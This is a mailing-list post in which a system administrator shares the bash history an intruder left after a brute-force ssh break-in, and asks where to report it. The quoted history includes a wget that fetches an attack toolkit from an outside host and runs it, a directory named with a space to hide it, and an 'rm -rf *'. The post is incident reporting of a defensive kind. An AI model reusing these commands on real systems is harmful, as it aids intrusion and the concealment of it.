[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

[K12OSN] OT: Break-In report



I thought you guys might be interested in seeing the tracks of a computer break-in. I won't say whose system it was (to protect the embarassed), but the break-in was nothing but a brute-force ssh attempt at guessing usernames and passwords. A regular user account was compromised and here is his bash history:

ls
cd who
ls
exit
w
cd /var/tmp
ls -a
cd " mkdir " "
cd " "
wget quest.dif.jp/x.tgz
tar zxvf x.tgz
cd x
./start dbdb
cd ..
ls -a
rm -rf *
passwd
ls -a
ps aux
ps aux | grep dan  (note: the hacked user account was "dan")
top
who
exit

I particularly like the use of " " as a directory name. Nice and invisible. Also note that the invader put his files in two directories which have the "sticky" bit set: /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch of port-scanning. The OS is going to be re-installed anyway, just to be safe.

Are there any organizations out there that this should be reported to? (For instance, the way one might send reports to an antivirus group or a content filtering group).

-Rob


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]